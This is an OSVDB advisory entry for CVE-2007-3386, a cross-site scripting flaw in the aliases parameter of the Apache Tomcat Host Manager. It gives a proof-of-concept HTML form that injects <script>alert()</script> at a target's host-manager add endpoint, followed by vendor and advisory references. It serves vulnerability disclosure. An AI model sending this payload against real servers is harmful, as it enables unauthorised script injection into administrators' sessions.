Apache Tomcat Host Manager Servlet html/add Action aliases Variable XSS

2007-08-14T00:00:00
ID OSVDB:36417
Type osvdb
Reporter NTT OSS CENTER()
Modified 2007-08-14T00:00:00

Description

Manual Testing Notes

<form action="http://[target]:8080/host-manager/html/add" method="get"> <input type="hidden" NAME='name' VALUE="aaa"> <input type="hidden" NAME='aliases' VALUE="<script>alert()</script>"> <input type="submit"> </form>

References:

Vendor Specific News/Changelog Entry: http://tomcat.apache.org/security-6.html Security Tracker: 1018558 Secunia Advisory ID:27037 Secunia Advisory ID:27267 Secunia Advisory ID:28317 Secunia Advisory ID:26465 Secunia Advisory ID:27727 Secunia Advisory ID:26898 RedHat RHSA: RHSA-2007:0871 Other Advisory URL: HPSBUX02262 SSRT071447: Other Advisory URL: HPSBTU02276 SSRT071472: Other Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-November/msg00525.html Other Advisory URL: http://www.debian.org/security/2008/dsa-1447 ISS X-Force ID: 36001 FrSIRT Advisory: ADV-2007-3386 FrSIRT Advisory: ADV-2007-2880 FrSIRT Advisory: ADV-2007-3527 CVE-2007-3386 Bugtraq ID: 25314